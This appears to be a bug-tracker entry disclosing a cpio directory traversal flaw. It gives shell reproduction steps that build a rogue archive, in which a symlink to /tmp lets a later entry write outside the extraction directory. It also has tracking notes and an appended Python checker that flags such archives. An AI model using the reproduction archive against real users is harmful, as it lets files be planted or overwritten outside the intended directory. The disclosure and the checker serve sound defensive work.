It was reported that cpio is susceptible to a directory traversal vulnerability.
Original report follows:
While extracting an archive, it will extract symlinks and then follow them if
they are referenced in further entries. This can be exploited by a rogue
archive to write files outside the current directory.
1) create a sample archive:
ln -s /tmp dir
echo dir | cpio -oF test.cpio
echo hello > dir/file
echo dir/file | cpio -oAF test.cpio
rm -r dir
2) test it:
cpio --no-absolute-filenames -ivF test.cpio
This will create a symlink "dir" in the current directory and a file
No patches are available at this time.
This attack requires social engineering the user into opening the cpio archive; the impact of this is low.
SUSE created a patch for this, attached at:
Created cpio tracking bugs for this issue:
Affects: fedora-all [bug 1188590]
*** Bug 1539685 has been marked as a duplicate of this bug. ***
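A pre-extraction check for the symlink-then-follow pattern described in the original report, as an added example that is not part of this bug report or of cpio itself. It assumes the archive is in newc format (the report's commands do not name a format), and `newc_entry`, `parse_newc`, `unsafe_entries` and `SAMPLE` are hypothetical names; the sample archive is constructed inline to mirror the reproduction steps.

```python
S_IFMT, S_IFLNK = 0o170000, 0o120000

def newc_entry(name, mode, data=b""):
    """Build one newc cpio entry (used only to construct sample input)."""
    n = name.encode() + b"\0"
    fields = [0, mode, 0, 0, 1, 0, len(data), 0, 0, 0, 0, len(n), 0]
    out = b"070701" + b"".join(b"%08x" % f for f in fields) + n
    out += b"\0" * (-len(out) % 4)            # name is padded to 4 bytes
    return out + data + b"\0" * (-len(data) % 4)

def parse_newc(buf):
    """Yield (name, mode, data) per entry, stopping at TRAILER!!!."""
    off = 0
    while off + 110 <= len(buf):
        if buf[off:off + 6] not in (b"070701", b"070702"):
            raise ValueError("not a newc header at offset %d" % off)
        f = [int(buf[off + 6 + 8 * i:off + 14 + 8 * i], 16) for i in range(13)]
        mode, size, namesize = f[1], f[6], f[11]
        start = off + 110
        name = buf[start:start + namesize - 1].decode(errors="replace")
        if name == "TRAILER!!!":
            return
        data_off = (start + namesize + 3) & ~3
        yield name, mode, buf[data_off:data_off + size]
        off = (data_off + size + 3) & ~3

def unsafe_entries(buf):
    """List entries whose parent directory is a symlink created earlier
    in the same archive, i.e. the write would land at the link target."""
    links, findings = {}, []
    for name, mode, data in parse_newc(buf):
        parts = [p for p in name.split("/") if p not in ("", ".")]
        for i in range(1, len(parts)):
            prefix = "/".join(parts[:i])
            if prefix in links:
                findings.append(
                    (name, "parent %r is a symlink to %r" % (prefix, links[prefix])))
                break
        if mode & S_IFMT == S_IFLNK:          # symlink target is the entry data
            links["/".join(parts)] = data.decode(errors="replace")
    return findings

# Constructed sample mirroring the report: symlink "dir" -> /tmp, then "dir/file".
SAMPLE = (newc_entry("dir", 0o120777, b"/tmp")
          + newc_entry("dir/file", 0o100644, b"hello\n")
          + newc_entry("safe/file", 0o100644, b"ok\n")
          + newc_entry("TRAILER!!!", 0))

if __name__ == "__main__":
    for name, reason in unsafe_entries(SAMPLE):
        print("REJECT", name, "-", reason)
```

An archive with any finding can be refused before `cpio -i` is run on it; the check is independent of `--no-absolute-filenames`, which does not cover this case according to the report.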